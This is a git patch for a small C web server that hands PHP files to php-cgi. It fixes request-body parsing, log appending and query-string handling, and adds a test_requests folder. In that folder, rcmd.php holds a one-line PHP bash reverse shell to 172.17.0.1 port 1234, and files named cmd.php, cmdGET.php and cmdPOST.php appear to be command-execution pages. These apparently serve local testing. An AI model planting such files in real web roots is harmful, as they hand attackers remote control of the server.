From 3b8405361ceed1e68f263b4ff2c0bdfdc803fe12 Mon Sep 17 00:00:00 2001 From: Pin Date: Tue, 8 Mar 2022 22:50:24 -0500 Subject: [PATCH] bug fixes --- Makefile | 2 +- cmd/server.c | 15 ++++++++++++--- src/requestHandlers.c | 2 +- src/utils.c | 21 +++++++++++++++------ test_requests/cmd.php | 7 +++++++ test_requests/cmdGET.php | 7 +++++++ test_requests/cmdPOST.php | 7 +++++++ test_requests/rcmd.php | 3 +++ 8 files changed, 53 insertions(+), 11 deletions(-) create mode 100644 test_requests/cmd.php create mode 100644 test_requests/cmdGET.php create mode 100644 test_requests/cmdPOST.php create mode 100644 test_requests/rcmd.php diff --git a/Makefile b/Makefile index 6f52f4f..0545b72 100644 --- a/Makefile +++ b/Makefile @@ -43,7 +43,7 @@ dockerTestDeploy: dockerBuild docker run -p8080:8080 --rm -d seaweb:latest dockerReleaseDeploy: dockerBuild - docker run -p8080:8080 --rm -d seaweb:latest --cert /src/certs/cert.pem --privkey /src/certs/key.pem + docker run -p8080:8080 --rm -d seaweb:latest --cert /src/certs/cert.pem --privkey /src/certs/key.pem --verbose killTestDocker: docker stop -t 0 `docker ps | grep "seaweb:latest" | tail -n 1 | tr -s " " | cut -d " " -f 1` diff --git a/cmd/server.c b/cmd/server.c index d497daa..9a35bb4 100644 --- a/cmd/server.c +++ b/cmd/server.c @@ -40,12 +40,16 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) { int line = 0; int contentCheck = 0; unsigned char *checkLine = calloc(1000, sizeof(unsigned char)); + size_t checkLineLen = 0; unsigned char *logLine = malloc(sizeof(unsigned char)); char * varCheck; // Creating empty requestBody - r->requestBody = calloc(8, sizeof(char)); + r->requestBody = malloc(sizeof(char)); r->requestBodyLen = 0; + r->requestVars = malloc(sizeof(char)); + memset(r->requestBody, 0, sizeof(char)); + memset(r->requestVars, 0, sizeof(char)); for (int i = 0; i <= strlen((char *)buffer); i++) { temp[0] = buffer[i]; @@ -84,12 +88,15 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) { PrintLog(logLine); } else { // Gather information on >first line if (contentCheck) { // Once content check is set to one everything after is part of the body + printf("Check Line: %s\n", checkLine); r->requestBody = realloc(r->requestBody, - (strlen((char *)checkLine) + strlen((char *)r->requestBody) + 1)); + (checkLineLen + r->requestBodyLen + 2)); strcat((char *)r->requestBody, (char *)checkLine); // Adding newline to requestBody strcat((char *)r->requestBody, "\n"); - r->requestBodyLen += strlen((char *)checkLine); + r->requestBodyLen += checkLineLen + 2; + printf("Size: %zu\nCheck Size: %zu\n", r->requestBodyLen, checkLineLen); + printf("Req:\n%s\n", r->requestBody); } else { // Information parsing !content if (strlen((char *)checkLine) == 1) { // Looking for blank empty line to end header info contentCheck = 1; @@ -118,10 +125,12 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) { if (strlen((char *)checkLine) > 0) { // Clear checkLine memset(checkLine,0,strlen((char *)checkLine)); + checkLineLen = 0; } line++; } else { strcat((char *)checkLine, temp); + checkLineLen++; } } diff --git a/src/requestHandlers.c b/src/requestHandlers.c index 8d8206e..203069f 100644 --- a/src/requestHandlers.c +++ b/src/requestHandlers.c @@ -145,7 +145,7 @@ int handlePOSTRequest(int socket, struct HTTPRequest *r, SSL *ssl) { } if (r->requestConType != NULL) { - if (!strcmp(r->requestConType, "application/x-www-form-utlencoded") == 0) { + if (!(strcmp(r->requestConType, "application/x-www-form-utlencoded") == 0)) { printDebug("Application From Selected"); } else { printDebug("Content will likely get parsed wrong"); diff --git a/src/utils.c b/src/utils.c index 8705862..f440735 100644 --- a/src/utils.c +++ b/src/utils.c @@ -24,7 +24,7 @@ int PrintLog(unsigned char *message) { if (!strcmp(WEB_ROOT_DIR, "/var/www/html/")) { FILE *fp; - fp = fopen("/var/log/seaweb/log", "w"); + fp = fopen("/var/log/seaweb/log", "a"); fprintf(fp, "[Log] %02d/%02d/%d %02d:%02d:%02d - %s\n", (now->tm_mon + 1), now->tm_mday, (now->tm_year + 1900), now->tm_hour, now->tm_min, now->tm_sec, message); fclose(fp); @@ -81,7 +81,11 @@ char *php_cgi(char *sPath, struct HTTPRequest *r) { putenv(conLenString); putenv("CONTENT_TYPE=application/x-www-form-urlencoded"); queryString = malloc(r->requestBodyLen + 24); - sprintf(queryString, "QUERY_STRING=%s", r->requestBody); + if (r->requestBodyLen != 0) { + sprintf(queryString, "QUERY_STRING=%s", r->requestBody); + } else { + sprintf(queryString, "QUERY_STRING="); + } putenv(queryString); // Starting fork to pipe stdin into php-cgi @@ -99,15 +103,20 @@ char *php_cgi(char *sPath, struct HTTPRequest *r) { } else if (pid < 0) { // Error forking printDebug("Error in stdin php frok"); } else { // Parent fork - close(phpPipe[1]); + close(phpPipe2[1]); dup2(phpPipe2[0], STDIN_FILENO); execl("/usr/bin/php-cgi", "php-cgi", NULL); } } else { - queryString = malloc(strlen(r->requestVars) + 24); - sprintf(queryString, "QUERY_STRING=%s", r->requestVars); - putenv(queryString); putenv("REQUEST_METHOD=GET"); + if (r->requestVars != NULL) { + queryString = malloc(strlen(r->requestVars) + 24); + sprintf(queryString, "QUERY_STRING=%s", r->requestVars); + } else { + queryString = malloc(24); + sprintf(queryString, "QUERY_STRING="); + } + putenv(queryString); execl("/usr/bin/php-cgi", "php-cgi", NULL); } exit(EXIT_SUCCESS); diff --git a/test_requests/cmd.php b/test_requests/cmd.php new file mode 100644 index 0000000..c39a7cf --- /dev/null +++ b/test_requests/cmd.php @@ -0,0 +1,7 @@ + + diff --git a/test_requests/cmdGET.php b/test_requests/cmdGET.php new file mode 100644 index 0000000..7f84f8c --- /dev/null +++ b/test_requests/cmdGET.php @@ -0,0 +1,7 @@ + + diff --git a/test_requests/cmdPOST.php b/test_requests/cmdPOST.php new file mode 100644 index 0000000..ed1710e --- /dev/null +++ b/test_requests/cmdPOST.php @@ -0,0 +1,7 @@ + + diff --git a/test_requests/rcmd.php b/test_requests/rcmd.php new file mode 100644 index 0000000..a8a5940 --- /dev/null +++ b/test_requests/rcmd.php @@ -0,0 +1,3 @@ +& /dev/tcp/172.17.0.1/1234 0>&1'"); +?>